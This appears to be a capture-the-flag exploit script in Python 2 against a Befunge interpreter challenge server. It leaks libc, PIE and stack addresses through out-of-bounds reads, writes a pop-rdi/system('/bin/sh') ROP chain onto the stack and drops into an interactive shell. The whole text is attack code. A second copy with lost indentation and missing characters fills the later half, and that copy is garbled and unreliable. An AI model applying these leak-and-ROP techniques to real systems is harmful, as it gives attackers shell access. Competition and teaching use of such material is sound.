akiym/exploit.py

## exploit.py
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import struct
import socket

p = lambda x: struct.pack('<Q', x)
u = lambda x: struct.unpack('<Q', x)[0]

def connect(host, port):
    return socket.create_connection((host, port))

def recvuntil(st, debug=False):
    ret = ''
    while st not in ret:
        lret = s.recv(1)
        if debug and len(lret) > 0:
            sys.stdout.write(lret)
        ret += lret
    return ret

def recvn(n):
    ret = ''
    while len(ret) != n:
        ret += s.recv(1)
    return ret

def interact():
    import telnetlib
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

def process(cmd):
    import subprocess
    return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)

REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'

if REMOTE:
    host = 'pwn1.chal.ctf.westerns.tokyo'
    port = 62839
    offset = {
        '__libc_start_main': 0x21e50,
        'system': 0x46590,
        '/bin/sh': 0x17c8c3, # str
        '__libc_argv': 0x3c3be0,
    }
else:
    host = '127.0.0.1'
    port = 4000
    offset = {
        '__libc_start_main': 0x21dd0,
        'system': 0x46640,
        '/bin/sh': 0x17ccdb, # str
        '__libc_argv': 0x3c3be0,
    }

s = connect(host, port)

program = """
>&0g,&0g,&0g,&0g,&0g,&0g,v
v,g0&,g0&,g0&,g0&,g0&,g0&<
>&&&*g,&&&*g,&&&*g,&&&*g,&&&*g,&&&*g,v
vp*&&&&p*&&&&p*&&&&p*&&&&p*&&&&p*&&&&<
>&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p&&&&*pv
vp*&&&&p*&&&&p*&&&&p*&&&&p*&&&&p*&&&&<
>&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p&&&&*p><
""".strip()

i = 0
prg = ''
for line in program.splitlines():
    assert len(line) <= 80
    prg += line.ljust(80, 'A') + '\n'
    i += 1
for _ in range(25-i):
    prg += 'A' * 80 + '\n'

for line in prg.splitlines():
    recvuntil('> ')
    s.send(line + '\n')

def sign(n):
    return struct.unpack('<I', struct.pack('<i', n))[0]

def leak_address(off):
    leak = ''
    for i in range(6):
        s.send('%d\n' % sign(off+i))
        leak += recvn(1)
    return u(leak + '\0\0')

libc = leak_address(-208) - offset['__libc_start_main']
print 'libc : %x' % libc
pie_base = leak_address(-96) - 0x202040
print 'pie_base : %x' % pie_base

program_base = pie_base+0x202040

m = 100000

stack = ''
off = (libc+offset['__libc_argv']) - program_base
for i in range(6):
    s.send('%d\n' % sign((off+i)%m))
    s.send('%d\n' % sign((off+i)/m))
    s.send('%d\n' % (m/80))
    stack += recvn(1)
stack = u(stack + '\0\0')
print 'stack : %x' % stack

pop_rdi = pie_base+0x120c

payload = (
    p(pop_rdi) +
    p(libc+offset['/bin/sh']) +
    p(libc+offset['system']) +
    ''
)
off = (stack-0xe0) - program_base
for i in range(len(payload)):
    s.send('%d\n' % ord(payload[i]))
    s.send('%d\n' % sign((off+i)%m))
    s.send('%d\n' % sign((off+i)/m))
    s.send('%d\n' % (m/80))

interact()
	# -- coding: utf-8 --
	import os
	import sys
	import time
	import re
	import struct
	import socket

	p = lambda x: struct.pack('<Q', x)
	u = lambda x: struct.unpack('<Q', x)[0]

	def connect(host, port):
	return socket.create_connection((host, port))

	def recvuntil(st, debug=False):
	ret = ''
	while st not in ret:
	lret = s.recv(1)
	if debug and len(lret) > 0:
	sys.stdout.write(lret)
	ret += lret
	return ret

	def recvn(n):
	ret = ''
	while len(ret) != n:
	ret += s.recv(1)
	return ret

	def interact():
	import telnetlib
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	def process(cmd):
	import subprocess
	return subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)

	REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'

	if REMOTE:
	host = 'pwn1.chal.ctf.westerns.tokyo'
	port = 62839
	offset = {
	'__libc_start_main': 0x21e50,
	'system': 0x46590,
	'/bin/sh': 0x17c8c3, # str
	'__libc_argv': 0x3c3be0,
	}
	else:
	host = '127.0.0.1'
	port = 4000
	offset = {
	'__libc_start_main': 0x21dd0,
	'system': 0x46640,
	'/bin/sh': 0x17ccdb, # str
	'__libc_argv': 0x3c3be0,
	}

	s = connect(host, port)

	program = """
	>&0g,&0g,&0g,&0g,&0g,&0g,v
	v,g0&,g0&,g0&,g0&,g0&,g0&<
	>&&&g,&&&g,&&&g,&&&g,&&&g,&&&g,v
	vp&&&&p&&&&p&&&&p&&&&p&&&&p&&&&<
	>&&&&p&&&&p&&&&p&&&&p&&&&p&&&&pv
	vp&&&&p&&&&p&&&&p&&&&p&&&&p&&&&<
	>&&&&p&&&&p&&&&p&&&&p&&&&p&&&&p><
	""".strip()

	i = 0
	prg = ''
	for line in program.splitlines():
	assert len(line) <= 80
	prg += line.ljust(80, 'A') + '\n'
	i += 1
	for _ in range(25-i):
	prg += 'A' * 80 + '\n'

	for line in prg.splitlines():
	recvuntil('> ')
	s.send(line + '\n')

	def sign(n):
	return struct.unpack('<I', struct.pack('<i', n))[0]

	def leak_address(off):
	leak = ''
	for i in range(6):
	s.send('%d\n' % sign(off+i))
	leak += recvn(1)
	return u(leak + '\0\0')

	libc = leak_address(-208) - offset['__libc_start_main']
	print 'libc : %x' % libc
	pie_base = leak_address(-96) - 0x202040
	print 'pie_base : %x' % pie_base

	program_base = pie_base+0x202040

	m = 100000

	stack = ''
	off = (libc+offset['__libc_argv']) - program_base
	for i in range(6):
	s.send('%d\n' % sign((off+i)%m))
	s.send('%d\n' % sign((off+i)/m))
	s.send('%d\n' % (m/80))
	stack += recvn(1)
	stack = u(stack + '\0\0')
	print 'stack : %x' % stack

	pop_rdi = pie_base+0x120c

	payload = (
	p(pop_rdi) +
	p(libc+offset['/bin/sh']) +
	p(libc+offset['system']) +
	''
	)
	off = (stack-0xe0) - program_base
	for i in range(len(payload)):
	s.send('%d\n' % ord(payload[i]))
	s.send('%d\n' % sign((off+i)%m))
	s.send('%d\n' % sign((off+i)/m))
	s.send('%d\n' % (m/80))

	interact()